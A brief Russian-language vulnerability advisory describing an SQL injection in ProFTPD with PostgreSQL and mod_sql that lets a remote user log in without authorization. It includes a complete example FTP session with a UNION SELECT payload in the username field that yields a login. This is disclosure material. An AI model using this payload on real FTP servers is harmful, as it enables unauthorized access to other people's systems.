SQL инъекция обнаружена в ProFTPD при использовании Postgresql и mod_sql. Удаленный пользователь может войти в систему без авторизации. 

Сообщается, что mod_sql_postgres не фильтрует данные, представленные пользователем. Удаленный пользователь может внедрить SQL код в переменную user login, чтобы получить доступ к системе без авторизации. Пример: 

runlevel@runlevel:~/$ ftp localhost
Connected to localhost.
220 ProFTPD 1.2.8 Server (Debian) [*****]
Name (localhost:runlevel): ')UNION SELECT
'u','p',1001,1001,'/tmp','/bin/bash' WHERE(''='
331 Password required for ')UNION.
Password:
230 User ')UNION SELECT 'u','p',1001,1001,'/tmp'
,'/bin/bash' WHERE(''=' logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Уязвимость обнаружена в ProFTPD 1.2.9rc1 и более ранние версии.

Эксплоит

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии